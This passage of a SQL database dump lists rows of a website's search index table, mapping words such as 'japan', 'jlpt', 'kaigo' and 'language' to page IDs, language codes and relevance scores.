('japan', 68, 'ja', 'node_search', 1),
('japan', 69, 'en', 'node_search', 3),
('japan', 73, 'en', 'node_search', 1),
('japan', 76, 'en', 'node_search', 4),
('japan', 77, 'en', 'node_search', 1),
('japan', 78, 'en', 'node_search', 1),
('japan', 79, 'en', 'node_search', 1),
('japan', 80, 'en', 'node_search', 5),
('japan', 80, 'ja', 'node_search', 0.980874),
('japan', 87, 'en', 'node_search', 29),
('japan', 87, 'ja', 'node_search', 27.5732),
('japan', 98, 'en', 'node_search', 1),
('japan', 111, 'en', 'node_search', 3),
('japan', 111, 'ja', 'node_search', 1),
('japan', 113, 'en', 'node_search', 1),
('japan', 113, 'ja', 'node_search', 1),
('japan', 115, 'en', 'node_search', 1),
('japan', 121, 'en', 'node_search', 1),
('japan', 126, 'en', 'node_search', 48),
('japan', 126, 'ja', 'node_search', 27),
('japan', 132, 'en', 'node_search', 1),
('japan', 133, 'en', 'node_search', 1),
('japan', 134, 'en', 'node_search', 1),
('japan', 137, 'en', 'node_search', 1),
('japan', 139, 'en', 'node_search', 1),
('japan', 140, 'en', 'node_search', 1),
('japan', 141, 'en', 'node_search', 1),
('japan', 142, 'en', 'node_search', 1),
('japan', 143, 'en', 'node_search', 1),
('japan', 144, 'en', 'node_search', 1),
('japan', 147, 'en', 'node_search', 7),
('japan', 150, 'en', 'node_search', 1),
('japan', 154, 'en', 'node_search', 34),
('japan', 155, 'en', 'node_search', 3),
('japan', 156, 'en', 'node_search', 30),
('japan', 157, 'en', 'node_search', 30),
('japan', 160, 'en', 'node_search', 9),
('japan', 161, 'en', 'node_search', 5),
('japan', 162, 'en', 'node_search', 34.9132),
('japan', 163, 'en', 'node_search', 34),
('japan', 164, 'en', 'node_search', 35),
('japan', 165, 'en', 'node_search', 35),
('japan', 166, 'en', 'node_search', 4),
('japan', 167, 'en', 'node_search', 35),
('japan', 168, 'en', 'node_search', 4),
('japan', 169, 'en', 'node_search', 37),
('japan', 170, 'en', 'node_search', 4),
('japan', 171, 'en', 'node_search', 38),
('japan', 173, 'en', 'node_search', 38),
('japan', 174, 'en', 'node_search', 35),
('japan', 175, 'en', 'node_search', 35),
('japan', 176, 'en', 'node_search', 35),
('japan', 177, 'en', 'node_search', 35),
('japan', 178, 'en', 'node_search', 31),
('japan', 179, 'en', 'node_search', 4),
('japan', 180, 'en', 'node_search', 4),
('japan', 181, 'en', 'node_search', 1),
('japan', 183, 'en', 'node_search', 1),
('japan', 184, 'en', 'node_search', 35),
('japan', 185, 'en', 'node_search', 4),
('japan', 186, 'en', 'node_search', 30),
('japan', 187, 'en', 'node_search', 5),
('japan', 188, 'en', 'node_search', 31),
('japan', 189, 'en', 'node_search', 3),
('japan', 190, 'en', 'node_search', 5),
('japan', 191, 'en', 'node_search', 4),
('japan', 192, 'en', 'node_search', 5),
('japan', 193, 'en', 'node_search', 4),
('japan', 194, 'en', 'node_search', 4),
('japan', 195, 'en', 'node_search', 4),
('japan', 196, 'en', 'node_search', 5),
('japan', 197, 'en', 'node_search', 30),
('japan', 198, 'en', 'node_search', 31),
('japan', 199, 'en', 'node_search', 4),
('japanese', 24, 'en', 'node_search', 4.25299),
('japanese', 28, 'en', 'node_search', 28),
('japanese', 66, 'en', 'node_search', 33.9769),
('japanese', 67, 'en', 'help_search', 1),
('japanese', 67, 'ja', 'help_search', 1),
('japanese', 67, 'ja', 'node_search', 2),
('japanese', 67, 'ko', 'help_search', 1),
('japanese', 77, 'en', 'node_search', 4),
('japanese', 87, 'en', 'node_search', 3),
('japanese', 122, 'en', 'node_search', 1),
('japanese', 133, 'en', 'node_search', 2),
('japanese', 135, 'en', 'node_search', 1),
('japanese', 136, 'en', 'node_search', 1),
('japanese', 138, 'en', 'node_search', 1),
('japanese', 166, 'en', 'node_search', 1),
('japanese', 168, 'en', 'node_search', 1),
('japanese', 181, 'en', 'node_search', 3),
('japanese', 182, 'en', 'node_search', 2),
('japanese', 183, 'en', 'node_search', 10),
('japanstudents', 142, 'en', 'node_search', 1),
('japanwishing', 113, 'en', 'node_search', 1),
('javascript', 23, 'en', 'help_search', 2),
('javascript', 23, 'ja', 'help_search', 2),
('javascript', 23, 'ko', 'help_search', 2),
('javascript', 33, 'en', 'help_search', 1),
('javascript', 33, 'ja', 'help_search', 1),
('javascript', 33, 'ko', 'help_search', 1),
('javascript', 37, 'en', 'help_search', 1.85135),
('javascript', 37, 'ja', 'help_search', 1.85135),
('javascript', 37, 'ko', 'help_search', 1.85135),
('javascript', 81, 'en', 'help_search', 1),
('javascript', 81, 'ja', 'help_search', 1),
('javascript', 81, 'ko', 'help_search', 1),
('jft', 23, 'en', 'node_search', 0.802752),
('jft', 23, 'ja', 'node_search', 0.461904),
('jft', 23, 'ko', 'node_search', 0.731649),
('jft', 24, 'en', 'node_search', 1),
('jft', 24, 'ja', 'node_search', 0.718502),
('jft', 24, 'ko', 'node_search', 1),
('jlpt', 23, 'en', 'node_search', 0.805455),
('jlpt', 23, 'ja', 'node_search', 0.462781),
('jlpt', 23, 'ko', 'node_search', 0.733888),
('jlpt', 24, 'en', 'node_search', 1),
('jlpt', 24, 'ja', 'node_search', 0.72066),
('jlpt', 24, 'ko', 'node_search', 1),
('jlpt', 62, 'en', 'node_search', 29.8927),
('jlpt', 62, 'ja', 'node_search', 29.5664),
('jlpt', 162, 'en', 'node_search', 1.92384),
('jlpt', 162, 'ja', 'node_search', 1.6916),
('jlpt', 163, 'en', 'node_search', 1.9496),
('jlpt', 163, 'ja', 'node_search', 1.73614),
('jlpt', 181, 'en', 'node_search', 34),
('jlpt', 181, 'ja', 'node_search', 33.7869),
('jlpt', 182, 'en', 'node_search', 6),
('jlpt', 182, 'ja', 'node_search', 6.7974),
('jlpt', 183, 'en', 'node_search', 33),
('jlpt', 183, 'ja', 'node_search', 33.7361),
('job', 3, 'en', 'node_search', 2),
('job', 3, 'ko', 'node_search', 2),
('job', 23, 'en', 'node_search', 1.81608),
('job', 24, 'en', 'node_search', 1),
('job', 28, 'en', 'node_search', 1),
('job', 66, 'en', 'node_search', 1),
('job', 68, 'en', 'node_search', 1),
('job', 73, 'en', 'node_search', 1),
('job', 112, 'en', 'node_search', 1),
('job', 121, 'en', 'node_search', 1),
('job', 132, 'en', 'node_search', 1),
('job', 133, 'en', 'node_search', 1),
('job', 155, 'en', 'node_search', 1),
('job', 162, 'en', 'node_search', 8),
('job', 163, 'en', 'node_search', 8),
('jobs', 3, 'en', 'node_search', 2),
('jobs', 3, 'ko', 'node_search', 2),
('jobs', 7, 'en', 'node_search', 2),
('jobs', 7, 'ko', 'node_search', 2),
('jobs', 31, 'ja', 'help_search', 1),
('join', 62, 'en', 'node_search', 1.83645),
('join', 66, 'en', 'node_search', 0.968904),
('joint', 24, 'en', 'node_search', 0.725015),
('joint', 27, 'en', 'node_search', 1),
('journey', 1, 'en', 'node_search', 1),
('journey', 62, 'en', 'node_search', 2),
('journey', 66, 'en', 'node_search', 1),
('journey', 80, 'en', 'node_search', 4),
('journey', 120, 'en', 'node_search', 4),
('journey', 140, 'en', 'node_search', 1),
('journey', 154, 'en', 'node_search', 1),
('journey', 161, 'en', 'node_search', 1),
('journey', 164, 'en', 'node_search', 28),
('journey', 167, 'en', 'node_search', 1),
('journey', 168, 'en', 'node_search', 1),
('journey', 169, 'en', 'node_search', 4),
('journey', 171, 'en', 'node_search', 28),
('journey', 173, 'en', 'node_search', 1),
('journey', 175, 'en', 'node_search', 27),
('journey', 176, 'en', 'node_search', 1),
('journey', 177, 'en', 'node_search', 2),
('journey', 178, 'en', 'node_search', 1),
('journey', 179, 'en', 'node_search', 1),
('journey', 182, 'en', 'node_search', 27),
('journey', 185, 'en', 'node_search', 1),
('journey', 187, 'en', 'node_search', 1),
('journey', 188, 'en', 'node_search', 1),
('journey', 190, 'en', 'node_search', 1),
('journey', 191, 'en', 'node_search', 2),
('journey', 192, 'en', 'node_search', 1),
('journey', 193, 'en', 'node_search', 1),
('journey', 194, 'en', 'node_search', 1),
('journey', 195, 'en', 'node_search', 1),
('journey', 196, 'en', 'node_search', 1),
('journey', 197, 'en', 'node_search', 1),
('journey', 199, 'en', 'node_search', 1),
('joy', 67, 'ja', 'node_search', 1),
('joy', 135, 'en', 'node_search', 1),
('json', 44, 'en', 'help_search', 36),
('json', 44, 'ja', 'help_search', 36),
('json', 44, 'ko', 'help_search', 36),
('july', 142, 'en', 'node_search', 1),
('june', 154, 'en', 'node_search', 6),
('june', 155, 'en', 'node_search', 1),
('june', 164, 'en', 'node_search', 2),
('june', 165, 'en', 'node_search', 6),
('just', 2, 'en', 'help_search', 1),
('just', 2, 'ja', 'help_search', 1),
('just', 2, 'ko', 'help_search', 1),
('just', 6, 'en', 'help_search', 1),
('just', 6, 'ja', 'help_search', 1),
('just', 6, 'ko', 'help_search', 1),
('just', 56, 'en', 'help_search', 1),
('just', 56, 'ja', 'help_search', 1),
('just', 56, 'ko', 'help_search', 1),
('just', 92, 'en', 'help_search', 1),
('just', 92, 'ja', 'help_search', 1),
('just', 92, 'ko', 'help_search', 1),
('kaigo', 24, 'en', 'node_search', 0.754681),
('kaigo', 24, 'ko', 'node_search', 0.736141),
('kaigo', 121, 'en', 'node_search', 1),
('kaigo', 126, 'en', 'node_search', 1),
('kaigo', 136, 'en', 'node_search', 1),
('kaigo', 137, 'en', 'node_search', 1),
('kaigo', 137, 'ja', 'node_search', 1),
('kaigo', 139, 'en', 'node_search', 1),
('kaigo', 139, 'ja', 'node_search', 1),
('kaigo', 141, 'en', 'node_search', 1),
('kaigo', 150, 'en', 'node_search', 46),
('kaigo', 150, 'ja', 'node_search', 27),
('kaigo', 154, 'en', 'node_search', 29),
('kaigo', 162, 'en', 'node_search', 5.92384),
('kaigo', 165, 'en', 'node_search', 2),
('kaigo', 169, 'en', 'node_search', 2),
('kaigo', 170, 'en', 'node_search', 32),
('kaigo', 171, 'en', 'node_search', 2),
('kaigo', 178, 'en', 'node_search', 2),
('kaigo', 188, 'en', 'node_search', 2),
('kaigo', 189, 'en', 'node_search', 6),
('kaiwa', 138, 'en', 'node_search', 1),
('kanji', 62, 'en', 'node_search', 2.78608),
('kaung', 81, 'en', 'node_search', 31),
('kaung', 81, 'ja', 'node_search', 31),
('kaw', 103, 'en', 'node_search', 2),
('kaw', 103, 'ja', 'node_search', 2),
('kaw', 137, 'en', 'node_search', 28),
('kaw', 137, 'ja', 'node_search', 28),
('kay', 129, 'en', 'node_search', 28),
('kay', 129, 'ja', 'node_search', 28),
('kay', 130, 'en', 'node_search', 1),
('kay', 130, 'ja', 'node_search', 1),
('kay', 153, 'en', 'node_search', 1),
('kay', 153, 'ja', 'node_search', 1),
('keep', 30, 'en', 'help_search', 0.906287),
('keep', 30, 'ja', 'help_search', 0.906287),
('keep', 30, 'ko', 'help_search', 0.906287),
('keep', 32, 'en', 'help_search', 1),
('keep', 32, 'ja', 'help_search', 1),
('keep', 32, 'ko', 'help_search', 1),
('keep', 38, 'en', 'help_search', 1),
('keep', 38, 'ja', 'help_search', 1),
('keep', 38, 'ko', 'help_search', 1),
('keep', 142, 'en', 'node_search', 1),
('keeping', 30, 'en', 'node_search', 2),
('keeping', 38, 'en', 'help_search', 2),
('keeping', 38, 'ja', 'help_search', 2),
('keeping', 38, 'ko', 'help_search', 2),
('kept', 47, 'en', 'help_search', 1),
('kept', 47, 'ja', 'help_search', 1),
('kept', 47, 'ko', 'help_search', 1),
('key', 61, 'en', 'help_search', 1),
('key', 61, 'ja', 'help_search', 1),
('key', 61, 'ko', 'help_search', 1),
('key', 81, 'en', 'help_search', 1),
('key', 81, 'ja', 'help_search', 1),
('key', 81, 'ko', 'help_search', 1),
('keyboardonly', 42, 'en', 'help_search', 1),
('keyboardonly', 42, 'ja', 'help_search', 1),
('keyboardonly', 42, 'ko', 'help_search', 1),
('keyword', 67, 'en', 'help_search', 1),
('keyword', 67, 'ja', 'help_search', 1),
('keyword', 67, 'ko', 'help_search', 1),
('keyword', 68, 'en', 'help_search', 1),
('keyword', 68, 'ja', 'help_search', 1),
('keyword', 68, 'ko', 'help_search', 1),
('keywords', 67, 'en', 'help_search', 1),
('keywords', 67, 'ja', 'help_search', 1),
('keywords', 67, 'ko', 'help_search', 1),
('keywords', 68, 'en', 'help_search', 1),
('keywords', 68, 'ja', 'help_search', 1),
('keywords', 68, 'ko', 'help_search', 1),
('keywords', 89, 'en', 'help_search', 1),
('keywords', 89, 'ja', 'help_search', 1),
('keywords', 89, 'ko', 'help_search', 1),
('khaing', 73, 'en', 'node_search', 1),
('khaing', 73, 'ja', 'node_search', 1),
('khaing', 76, 'en', 'node_search', 5),
('khaing', 76, 'ja', 'node_search', 5),
('khaing', 93, 'en', 'node_search', 2),
('khaing', 93, 'ja', 'node_search', 2),
('khaing', 97, 'en', 'node_search', 2),
('khaing', 97, 'ja', 'node_search', 2),
('khaing', 99, 'en', 'node_search', 2),
('khaing', 99, 'ja', 'node_search', 2),
('khaing', 104, 'en', 'node_search', 28),
('khaing', 104, 'ja', 'node_search', 37),
('khaing', 106, 'en', 'node_search', 31),
('khaing', 106, 'ja', 'node_search', 31),
('khaing', 111, 'en', 'node_search', 1),
('khaing', 111, 'ja', 'node_search', 1),
('khaing', 114, 'en', 'node_search', 28),
('khaing', 114, 'ja', 'node_search', 31),
('khaing', 139, 'en', 'node_search', 28),
('khaing', 139, 'ja', 'node_search', 31),
('khaing', 146, 'en', 'node_search', 29),
('khaing', 146, 'ja', 'node_search', 1),
('khaing', 157, 'en', 'node_search', 2),
('khaing', 157, 'ja', 'node_search', 2),
('khaing', 167, 'en', 'node_search', 1),
('khaing', 167, 'ja', 'node_search', 1),
('khant', 82, 'en', 'node_search', 28),
('khant', 82, 'ja', 'node_search', 28),
('khant', 106, 'en', 'node_search', 31),
('khant', 106, 'ja', 'node_search', 31),
('khant', 112, 'en', 'node_search', 28),
('khant', 112, 'ja', 'node_search', 31),
('khant', 148, 'en', 'node_search', 1),
('khant', 148, 'ja', 'node_search', 1),
('khet', 173, 'en', 'node_search', 1),
('khet', 173, 'ja', 'node_search', 1),
('khet', 191, 'en', 'node_search', 6),
('khet', 191, 'ja', 'node_search', 4.2327),
('khin', 73, 'en', 'node_search', 2),
('khin', 73, 'ja', 'node_search', 2),
('khin', 97, 'en', 'node_search', 4),
('khin', 97, 'ja', 'node_search', 4),
('khin', 108, 'en', 'node_search', 2),
('khin', 108, 'ja', 'node_search', 2),
('khin', 111, 'en', 'node_search', 4),
('khin', 111, 'ja', 'node_search', 4),
('khin', 113, 'en', 'node_search', 2),
('khin', 113, 'ja', 'node_search', 2),
('khin', 123, 'en', 'node_search', 28),
('khin', 123, 'ja', 'node_search', 31),
('khin', 134, 'en', 'node_search', 1),
('khin', 134, 'ja', 'node_search', 1),
('khin', 154, 'en', 'node_search', 2),
('khin', 154, 'ja', 'node_search', 2),
('khin', 173, 'en', 'node_search', 1),
('khin', 173, 'ja', 'node_search', 1),
('khine', 68, 'en', 'node_search', 4),
('khine', 68, 'ja', 'node_search', 4),
('khine', 103, 'en', 'node_search', 2),
('khine', 103, 'ja', 'node_search', 2),
('khine', 105, 'en', 'node_search', 2),
('khine', 105, 'ja', 'node_search', 2),
('khine', 111, 'en', 'node_search', 1),
('khine', 111, 'ja', 'node_search', 1),
('khine', 143, 'en', 'node_search', 28),
('khine', 143, 'ja', 'node_search', 31),
('khit', 173, 'en', 'node_search', 1),
('khit', 173, 'ja', 'node_search', 1),
('khit', 187, 'en', 'node_search', 6),
('khit', 187, 'ja', 'node_search', 3.96276),
('khu', 83, 'en', 'node_search', 2),
('khu', 83, 'ja', 'node_search', 2),
('khu', 115, 'en', 'node_search', 28),
('khu', 115, 'ja', 'node_search', 28),
('kind', 87, 'en', 'node_search', 1),
('kinds', 30, 'en', 'help_search', 19),
('kinds', 30, 'ja', 'help_search', 19),
('kinds', 30, 'ko', 'help_search', 19),
('kitchen', 67, 'ja', 'node_search', 1),
('kitchen', 122, 'en', 'node_search', 1),
('kitchen', 133, 'en', 'node_search', 1),
('kitchen', 135, 'en', 'node_search', 1),
('know', 3, 'en', 'node_search', 2.954),
('know', 3, 'ko', 'node_search', 2.9381),
('know', 31, 'en', 'node_search', 1),
('know', 67, 'ja', 'node_search', 1),
('knowing', 20, 'en', 'help_search', 1),
('knowing', 20, 'ja', 'help_search', 1),
('knowing', 20, 'ko', 'help_search', 1),
('knowledge', 27, 'en', 'node_search', 0.802752),
('knowledge', 30, 'en', 'node_search', 2),
('knowledge', 62, 'en', 'node_search', 1),
('knowledge', 133, 'en', 'node_search', 1),
('knowledge', 142, 'en', 'node_search', 1),
('knowledge', 190, 'en', 'node_search', 1),
('knowledge', 195, 'en', 'node_search', 1),
('known', 32, 'en', 'help_search', 1),
('known', 32, 'ja', 'help_search', 1),
('known', 32, 'ko', 'help_search', 1),
('known', 35, 'en', 'help_search', 1),
('known', 35, 'ja', 'help_search', 1),
('known', 35, 'ko', 'help_search', 1),
('known', 80, 'en', 'help_search', 2),
('known', 80, 'ja', 'help_search', 2),
('known', 80, 'ko', 'help_search', 2),
('korea', 3, 'en', 'node_search', 4.97286),
('korea', 3, 'ko', 'node_search', 4.96498),
('korea', 6, 'en', 'node_search', 28),
('korea', 8, 'en', 'node_search', 27),
('korea', 8, 'ko', 'node_search', 27),
('korea', 10, 'en', 'node_search', 28),
('korea', 10, 'ko', 'node_search', 28),
('korea', 19, 'en', 'node_search', 3),
('korea', 19, 'ko', 'node_search', 3),
('korea', 23, 'en', 'node_search', 1.807),
('korea', 24, 'en', 'node_search', 1.88282),
('korea', 31, 'en', 'node_search', 4.64698),
('korean', 3, 'en', 'node_search', 0.968904),
('korean', 3, 'ko', 'node_search', 0.961087),
('korean', 4, 'en', 'node_search', 2),
('korean', 4, 'ja', 'node_search', 2),
('korean', 24, 'en', 'node_search', 1.80275),
('korean', 28, 'en', 'node_search', 28),
('korean', 29, 'en', 'node_search', 28),
('korean', 31, 'en', 'node_search', 29.9029),
('korean', 67, 'en', 'help_search', 1),
('korean', 67, 'ja', 'help_search', 1),
('korean', 67, 'ko', 'help_search', 1),
('koshipa', 19, 'en', 'node_search', 28),
('koshipa', 19, 'ja', 'node_search', 3),
('koshipa', 19, 'ko', 'node_search', 28),
('koshipa', 24, 'en', 'node_search', 0.786915),
('koshipa', 24, 'ja', 'node_search', 0.443437),
('koshipa', 24, 'ko', 'node_search', 0.78951),
('koshipa', 29, 'en', 'node_search', 3),
('koshipa', 29, 'ja', 'node_search', 3),
('koshipa', 29, 'ko', 'node_search', 28),
('kyats', 3, 'en', 'node_search', 1),
('kyats', 3, 'ko', 'node_search', 1),
('kyaw', 73, 'en', 'node_search', 1),
('kyaw', 73, 'ja', 'node_search', 1),
('kyaw', 74, 'en', 'node_search', 1),
('kyaw', 74, 'ja', 'node_search', 1),
('kyaw', 90, 'en', 'node_search', 28),
('kyaw', 90, 'ja', 'node_search', 28),
('kyaw', 97, 'en', 'node_search', 2),
('kyaw', 97, 'ja', 'node_search', 2),
('kyaw', 111, 'en', 'node_search', 2),
('kyaw', 111, 'ja', 'node_search', 2),
('kyaw', 112, 'en', 'node_search', 28),
('kyaw', 112, 'ja', 'node_search', 31),
('kyaw', 124, 'en', 'node_search', 28),
('kyaw', 124, 'ja', 'node_search', 31),
('kyaw', 131, 'en', 'node_search', 28),
('kyaw', 131, 'ja', 'node_search', 31),
('kyaw', 145, 'en', 'node_search', 1),
('kyaw', 145, 'ja', 'node_search', 1),
('kyaw', 147, 'en', 'node_search', 34),
('kyaw', 147, 'ja', 'node_search', 34),
('kyaw', 154, 'en', 'node_search', 1),
('kyaw', 154, 'ja', 'node_search', 1),
('kyaw', 161, 'en', 'node_search', 5),
('kyaw', 161, 'ja', 'node_search', 1.74996),
('kyaw', 167, 'en', 'node_search', 1),
('kyaw', 167, 'ja', 'node_search', 1),
('kyaw', 169, 'en', 'node_search', 1),
('kyaw', 169, 'ja', 'node_search', 1),
('kyaw', 179, 'en', 'node_search', 3),
('kyaw', 179, 'ja', 'node_search', 1.73614),
('kyi', 103, 'en', 'node_search', 2),
('kyi', 103, 'ja', 'node_search', 2),
('kyi', 137, 'en', 'node_search', 28),
('kyi', 137, 'ja', 'node_search', 28),
('kyit', 90, 'en', 'node_search', 1),
('kyit', 90, 'ja', 'node_search', 1),
('label', 5, 'en', 'help_search', 1),
('label', 5, 'ja', 'help_search', 1),
('label', 5, 'ko', 'help_search', 1),
('label', 8, 'en', 'help_search', 4),
('label', 8, 'ja', 'help_search', 4),
('label', 8, 'ko', 'help_search', 4),
('label', 16, 'en', 'help_search', 4),
('label', 16, 'ja', 'help_search', 4),
('label', 16, 'ko', 'help_search', 4),
('label', 19, 'en', 'help_search', 4),
('label', 19, 'ja', 'help_search', 4),
('label', 19, 'ko', 'help_search', 4),
('label', 24, 'en', 'help_search', 10),
('label', 24, 'ja', 'help_search', 10),
('label', 24, 'ko', 'help_search', 10),
('label', 25, 'en', 'help_search', 7),
('label', 25, 'ja', 'help_search', 7),
('label', 27, 'en', 'help_search', 11),
('label', 27, 'ja', 'help_search', 11),
('label', 27, 'ko', 'help_search', 11),
('label', 59, 'en', 'help_search', 1),
('label', 59, 'ja', 'help_search', 1),
('label', 59, 'ko', 'help_search', 1),
('label', 66, 'en', 'help_search', 4),
('label', 66, 'ja', 'help_search', 4),
('labeled', 15, 'en', 'help_search', 1),
('labeled', 15, 'ja', 'help_search', 1),
('labeled', 15, 'ko', 'help_search', 1),
('labeled', 42, 'en', 'help_search', 1),
('labeled', 42, 'ja', 'help_search', 1),
('labeled', 42, 'ko', 'help_search', 1),
('labeled', 77, 'en', 'help_search', 1),
('labeled', 77, 'ja', 'help_search', 1),
('labeled', 77, 'ko', 'help_search', 1),
('labels', 31, 'ja', 'help_search', 4.84414),
('labor', 24, 'en', 'node_search', 0.845322),
('labour', 24, 'ja', 'node_search', 0.475426),
('lady', 18, 'en', 'node_search', 1),
('lady', 18, 'ko', 'node_search', 1),
('lakhs', 3, 'en', 'node_search', 2),
('lakhs', 3, 'ko', 'node_search', 2),
('language', 3, 'en', 'node_search', 1.96498),
('language', 3, 'ko', 'node_search', 1.95723),
('language', 4, 'en', 'node_search', 2),
('language', 4, 'ja', 'node_search', 2),
('language', 16, 'en', 'help_search', 7),
('language', 16, 'ja', 'help_search', 7),
('language', 16, 'ko', 'help_search', 7),
('language', 23, 'en', 'node_search', 0.786915),
('language', 24, 'en', 'node_search', 8.19496),
('language', 24, 'ja', 'node_search', 0.900819),
('language', 24, 'ko', 'node_search', 0.813674),
('language', 28, 'en', 'node_search', 85),
('language', 28, 'ja', 'node_search', 29),
('language', 28, 'ko', 'node_search', 29),
('language', 29, 'en', 'node_search', 3),
('language', 29, 'ja', 'node_search', 28),
('language', 29, 'ko', 'node_search', 28),
('language', 31, 'en', 'node_search', 1),
('language', 41, 'en', 'help_search', 7),
('language', 41, 'ja', 'help_search', 7),
('language', 41, 'ko', 'help_search', 7),
('language', 45, 'en', 'help_search', 1),
('language', 45, 'ja', 'help_search', 1),
('language', 45, 'ko', 'help_search', 1),
('language', 46, 'en', 'help_search', 1),
('language', 46, 'ja', 'help_search', 1),
('language', 46, 'ko', 'help_search', 1),
('language', 49, 'en', 'help_search', 63),
('language', 49, 'ja', 'help_search', 63),
('language', 49, 'ko', 'help_search', 63),
('language', 50, 'en', 'help_search', 90),
('language', 50, 'ja', 'help_search', 90),
('language', 50, 'ko', 'help_search', 90),
('language', 51, 'en', 'help_search', 5),
('language', 51, 'ja', 'help_search', 5),
('language', 51, 'ko', 'help_search', 5),
('language', 52, 'en', 'help_search', 10),
('language', 52, 'ja', 'help_search', 10),
('language', 52, 'ko', 'help_search', 10),
('language', 53, 'en', 'help_search', 6),
('language', 53, 'ja', 'help_search', 6),
('language', 53, 'ko', 'help_search', 6),
('language', 57, 'en', 'help_search', 2),
('language', 57, 'ja', 'help_search', 2),
('language', 57, 'ko', 'help_search', 2),
('language', 61, 'en', 'help_search', 4),
('language', 61, 'ja', 'help_search', 4),
('language', 61, 'ko', 'help_search', 4),
('language', 62, 'en', 'node_search', 6.49804),
('language', 66, 'en', 'node_search', 32.9769),
('language', 67, 'ja', 'node_search', 1),
('language', 68, 'en', 'help_search', 0.993146),
('language', 68, 'ja', 'help_search', 0.993146),
('language', 68, 'ko', 'help_search', 0.993146),
('language', 71, 'en', 'help_search', 8),
('language', 71, 'ja', 'help_search', 8),
('language', 71, 'ko', 'help_search', 8),
('language', 87, 'en', 'node_search', 1),
('language', 92, 'en', 'help_search', 48),
('language', 92, 'ja', 'help_search', 48),
('language', 92, 'ko', 'help_search', 48),
('language', 135, 'en', 'node_search', 1),
('language', 136, 'en', 'node_search', 1),
('language', 138, 'en', 'node_search', 1),
('language', 142, 'en', 'node_search', 46),
('language', 142, 'ja', 'node_search', 27),
('language', 155, 'en', 'node_search', 1),
('language', 173, 'en', 'node_search', 1),
('language', 181, 'en', 'node_search', 6),
('language', 182, 'en', 'node_search', 6),
('language', 183, 'en', 'node_search', 14),
('language', 184, 'en', 'node_search', 1),
('languagelearning', 66, 'en', 'node_search', 0.920273),
('languages', 10, 'en', 'help_search', 2),
('languages', 10, 'ja', 'help_search', 2),
('languages', 10, 'ko', 'help_search', 2),
('languages', 22, 'en', 'help_search', 2),
('languages', 22, 'ja', 'help_search', 2),
('languages', 22, 'ko', 'help_search', 2),
('languages', 39, 'en', 'help_search', 1),
('languages', 39, 'ja', 'help_search', 1),
('languages', 39, 'ko', 'help_search', 1),
('languages', 41, 'en', 'help_search', 49),
('languages', 41, 'ja', 'help_search', 49),
('languages', 41, 'ko', 'help_search', 49),
('languages', 43, 'en', 'help_search', 1),
('languages', 43, 'ja', 'help_search', 1),
('languages', 43, 'ko', 'help_search', 1),
('languages', 49, 'en', 'help_search', 5),
('languages', 49, 'ja', 'help_search', 5),
('languages', 49, 'ko', 'help_search', 5),
('languages', 50, 'en', 'help_search', 5),
('languages', 50, 'ja', 'help_search', 5),
('languages', 50, 'ko', 'help_search', 5),
('languages', 52, 'en', 'help_search', 1),
('languages', 52, 'ja', 'help_search', 1),
('languages', 52, 'ko', 'help_search', 1),
('languages', 53, 'en', 'help_search', 2),
('languages', 53, 'ja', 'help_search', 2),
('languages', 53, 'ko', 'help_search', 2),
('languages', 61, 'en', 'help_search', 1),
('languages', 61, 'ja', 'help_search', 1),
('languages', 61, 'ko', 'help_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('languages', 67, 'en', 'help_search', 1.9689),
('languages', 67, 'ja', 'help_search', 1.9689),
('languages', 67, 'ko', 'help_search', 1.9689),
('languages', 69, 'en', 'help_search', 0.968904),
('languages', 69, 'ja', 'help_search', 0.968904),
('languages', 69, 'ko', 'help_search', 0.968904),
('languages', 81, 'en', 'help_search', 1),
('languages', 81, 'ja', 'help_search', 1),
('languages', 81, 'ko', 'help_search', 1),
('languages', 92, 'en', 'help_search', 2),
('languages', 92, 'ja', 'help_search', 2),
('languages', 92, 'ko', 'help_search', 2),
('languagespecific', 68, 'en', 'help_search', 1),
('languagespecific', 68, 'ja', 'help_search', 1),
('languagespecific', 68, 'ko', 'help_search', 1),
('large', 68, 'en', 'help_search', 2),
('large', 68, 'ja', 'help_search', 2),
('large', 68, 'ko', 'help_search', 2),
('large', 77, 'en', 'node_search', 4),
('larger', 67, 'en', 'help_search', 1),
('larger', 67, 'ja', 'help_search', 1),
('larger', 67, 'ko', 'help_search', 1),
('largest', 23, 'en', 'node_search', 1),
('last', 3, 'en', 'node_search', 4),
('last', 3, 'ko', 'node_search', 4),
('last', 31, 'ja', 'help_search', 1),
('last', 32, 'en', 'help_search', 4),
('last', 32, 'ja', 'help_search', 4),
('last', 32, 'ko', 'help_search', 4),
('last', 47, 'en', 'help_search', 1),
('last', 47, 'ja', 'help_search', 1),
('last', 47, 'ko', 'help_search', 1),
('last', 65, 'en', 'help_search', 1),
('last', 65, 'ja', 'help_search', 1),
('last', 65, 'ko', 'help_search', 1),
('last', 76, 'en', 'help_search', 4),
('last', 76, 'ja', 'help_search', 4),
('last', 76, 'ko', 'help_search', 4),
('lasting', 25, 'en', 'node_search', 1),
('later', 4, 'en', 'help_search', 1),
('later', 4, 'ja', 'help_search', 1),
('later', 4, 'ko', 'help_search', 1),
('later', 37, 'en', 'help_search', 1.89272),
('later', 37, 'ja', 'help_search', 1.89272),
('later', 37, 'ko', 'help_search', 1.89272),
('later', 67, 'en', 'help_search', 0.934703),
('later', 67, 'ja', 'help_search', 0.934703),
('later', 67, 'ko', 'help_search', 0.934703),
('later', 90, 'en', 'help_search', 2),
('later', 90, 'ja', 'help_search', 2),
('later', 90, 'ko', 'help_search', 2),
('latt', 131, 'en', 'node_search', 28),
('latt', 131, 'ja', 'node_search', 31),
('latt', 145, 'en', 'node_search', 1),
('latt', 145, 'ja', 'node_search', 1),
('latt', 147, 'en', 'node_search', 34),
('latt', 147, 'ja', 'node_search', 34),
('launch', 66, 'en', 'node_search', 1),
('laundry', 162, 'en', 'node_search', 1),
('lay', 103, 'en', 'node_search', 4),
('lay', 103, 'ja', 'node_search', 4),
('lay', 139, 'en', 'node_search', 56),
('lay', 139, 'ja', 'node_search', 62),
('layout', 1, 'en', 'help_search', 4),
('layout', 1, 'ja', 'help_search', 4),
('layout', 1, 'ko', 'help_search', 4),
('layout', 3, 'en', 'help_search', 1),
('layout', 3, 'ja', 'help_search', 1),
('layout', 3, 'ko', 'help_search', 1),
('layout', 6, 'en', 'help_search', 1),
('layout', 6, 'ja', 'help_search', 1),
('layout', 6, 'ko', 'help_search', 1),
('layout', 29, 'en', 'help_search', 26.9617),
('layout', 29, 'ja', 'help_search', 26.9617),
('layout', 29, 'ko', 'help_search', 26.9617),
